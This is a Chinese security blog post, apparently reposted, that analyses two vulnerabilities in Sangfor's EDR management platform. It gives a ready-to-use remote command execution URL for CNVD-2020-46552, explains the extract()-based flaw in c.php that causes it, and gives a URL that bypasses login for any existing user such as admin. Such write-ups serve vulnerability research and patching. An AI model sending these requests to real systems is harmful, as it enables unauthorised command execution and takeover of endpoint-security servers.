深信服edr漏洞分析

admin 2022年1月6日01:50:40安全博客评论12 views622字阅读2分4秒阅读模式

EDR简介

终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。

漏洞复现:

远程命令执行漏洞CNVD-2020-46552

https://ip+端口/tool/log/c.php?strip_slashes=system&host=id

img

漏洞分析:

将c.php中的文件进行分析

img

$_REQUEST将传入的参数保存为数组,将前台的参数传入到$show_form

进入$show_form

img

使用了匿名函数,use调用了外部变量$strip_slashes、$show_input

extract()函数会从数组中将变量导入到当前的符号表。他会把数组变成变量,函数使用数组的键名为变量名,键值为变量值

$host是如果存在就执行$strip_slashes($host)

那么传参数的时候使用:strip_slashes=system&host=id

img

strip_slashes函数的作用是去掉&变量中的\

后台任意用户登陆漏洞

只要用户存在直接就可以登录

https://ip:xx/ui/login.php?user=任意用户名,如https://ip:xx/ui/login.php?user=admin

来源:https://blog.csdn.net/qq_32393893/article/details/108077482

FROM :b0urne.top | Author:b0urne

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:50:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  深信服edr漏洞分析 http://cn-sec.com/archives/722829.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: